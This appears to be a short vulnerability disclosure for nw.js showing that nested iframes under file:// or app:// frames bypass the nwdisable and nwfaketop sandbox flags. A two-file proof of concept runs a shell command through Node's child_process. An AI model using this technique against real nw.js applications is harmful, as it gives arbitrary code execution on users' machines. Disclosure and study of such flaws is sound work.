Code execution in nw.js: bypassing nwdisable in file:// and app:// frames

It’s possible to bypass nwdisable and nwfaketop flags by nesting iframes inside top-level sandboxed iframe that uses file:// or app://.

Proof of concept

# nwfaketop.html
<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Testing nwfaketop and nwdisable</title>
  </head>
  <body>
    <iframe src="file:///home/stardust/dev/sectest/node-webkit/nwfaketop/test.html" nwdisable nwfaketop>
    </iframe>
  </body>
</html>

# test.html
<script>
   var exec = require('child_process').exec;
   exec('uname -a',function (error, stdout, stdin) {alert(stdout)});
</script>

<iframe src="file:///home/stardust/dev/sectest/node-webkit/nwfaketop/test.html">
</iframe>

Result

nwjs_rce

Resources

https://github.com/nwjs/nw.js/issues/1614